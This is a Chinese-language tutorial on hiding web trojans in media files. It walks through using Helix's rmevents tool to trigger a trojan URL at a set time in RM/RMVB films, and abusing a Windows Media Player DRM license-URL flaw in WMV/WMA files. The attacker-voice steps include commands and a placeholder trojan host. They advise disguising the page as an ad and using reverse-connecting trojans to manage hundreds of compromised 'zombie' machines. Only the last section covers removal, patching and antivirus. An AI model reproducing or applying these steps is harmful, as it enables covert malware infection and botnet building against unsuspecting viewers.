如今网络上流传最为广泛的媒体文件有两类一类是RMRMVB文件另一类是WMVWMA文件由于它们对流媒体的良好支持使网络上的电影音乐等媒体文件几乎都采用了这两种媒体文件格式因此如果在媒体文件中植入木马那么媒体文件中木马独有的隐蔽性将会使受害者在不知不觉中被网页木马侵害危害性可见一斑
RMRMVB中加入木马
Helix Producer Plus是一款图形化的专业流媒体文件制作工具我们可以利用Helix Producer Plus这款软件把其他格式的文件转换成RM或RMVB格式当然也可以对已存在的RM文件进行重新编辑在编辑的同时我们可以把事先准备好的网页木马插入其中这样只要一打开这个编辑好的媒体文件插入在其中的网页木马也会随之打开我们甚至还能控制网页木马打开的时间让网页木马更隐蔽
步骤1:首先下载Helix Producer Plus一路Next完成安装然后我们要找一个能把网页木马插入其中的RM电影文件把它改名为film.rm然后拷贝到Helix Producer Plus安装目录的RealMediaEditor文件夹下
步骤2:我们在这个文件夹中新建一个文本文档命名为test.txt在test.txt文件中写入这样一句命令:u 00:07:00 00:07:30 http://www.***.com/in
dex.php这句命令的意思是当媒体文件播放到第7分钟后触发打开URL事件然后到7分30秒的时候事件结束最后面的就是URL的网址我们可以把这个网址改成我们的网页木马的地址关于网页木马的制作和设置已经多次介绍在此不再重复这样便可以在别人看媒体文件的时候打开网页木马让他不知不觉中招如图1
小提示:对于制作的网页木马应尽量隐蔽并模仿正常网页否则在看媒体文件时突然弹出网页谁都会有疑心当然把它做成类似的广告网页效果最好别人会以为是广告便一关了之而这时我们已经种马成功了对于木马的选择应尽量使用具有反向连接的木马如灰鸽子否则即使有了上百的肉鸡一个一个去连接也是很麻烦的
步骤3:运行CMD命令提示符进入RealMediaEditor文件夹输入命令:rmevents -i film.rm -e test.txt -o film2.rm这是最关键的一步意思是利用Helix Producer Plus自带的rmevents.exe把test.txt这个触发URL事件合并到film.rm中并另存为film2.rm这个新生成的film2.rm便是我们需要的带有网页木马的媒体文件如图2
WMVWMA中加入木马
对于WMAWMV文件我们可以利用其默认的播放器Windows Media Player的Microsoft Windows媒体播放器数字权限管理加载任意网页漏洞来插入木马当我们播放已经插入木马的恶意文件时播放器首先会弹出一个提示窗口说明此文件经过DRM加密需要通过URL验证证书而这个URL就是我们事先设置好的网页木马地址当用户点击是进行验证时我们便种马成功了和RM文件种马一样在WMV文件中插入木马我们还需要一样工具WMDRM打包加密器这是一款可以对WMAWMV进行DRM加密的文件软件本身是为了保护媒体文件的版权但在攻击者手中便成了黑客的帮凶
安装WMDRM打包加密器完成后运行软件界面很简洁如图3首先出现的是自定义打包标签我们点击源文件右边的浏览按钮选择一个WMA或WMV文件然后我们在下面的输出目录里选择生成恶意文件的保存路径然后在输出文件后缀 中填入生成的文件后缀建议和源文件保持一致完成后我们切换到认证字符串标签 在认证URL栏里输入我们的网页木马地址如:http://www.***.com/index.php,其他保持默认即可再切换到自定义打包标签点击打包加密’按钮植有网页木马的恶意媒体文件就生成了
当用户打开这个恶意媒体文件时Windows Media Player会要求你获取证书如图4点击确定后就会弹出我们的网页木马
有攻就有防我们不能坐以待毙任其宰割其实恶意媒体文件不是我们想象中的那么神秘只要我们掌握好一些清除网页木马的小知识,就可以完全阻止网页木马运行
RMRMVB木马清除方法
我们以上文中制作RM木马的方法为例新建一个内容为空的文本文件test.txt然后在CMD中运行rmevents -i 存在木马的媒体文件.rm -e test.txt -o film.rm这样便可以利用与插入木马相同的办法把触发URL事件覆盖掉这时输出的film.rm便是不存在木马的干净媒体文件了
如果对命令提示符的使用不熟悉我们使用Helix RealMedia Editor来清除其中的网页木马打开RealMediaEditor文件夹下的rmevents.exe文件其界面如图5所示同样新建一个内容为空的test.txt然后在Helix RealMedia Editor的菜单栏中点击Tools选择其中的Merge Events接着选择我们刚才创建的test.txt点击确定最后选择File菜单中的Save RealMedia File保存媒体文件即可其原理和利用rmevents.exe清除网页木马的原理是一样的
WMAWMV木马清除方法
由于这是利用了Windows Media Player的漏洞因此我们不能清除媒体文件中的恶意DRM加密信息我们唯一可以做的就是打好补丁恶意WMAWMV文件对打过补丁的Windows Media Player将不起作用补丁下载地址:http://www.microsoft.com/technet/security/
此外我们还可以选择其他的播放器来播放媒体文件如暴风影音Mplayer等一些在媒体文件中插入网页木马事件的功能在它们面前将不起作用因此这样也可以在一定程度上防范媒体网页木马
安全在很大程度上取决于用户的安全意识只有提高安全意识才能减少中招的概率比如不打开陌生的媒体文件不随意进入陌生的网站等当然光有安全意识还不够我们还需要杀毒软件等好帮手毕竟任何网页木马都需要先下载到本地才能运行而杀毒软件可以防止木马的运行因此我们必须及时升级杀毒软件的病毒库只有防先于攻才能算得上是真正的安全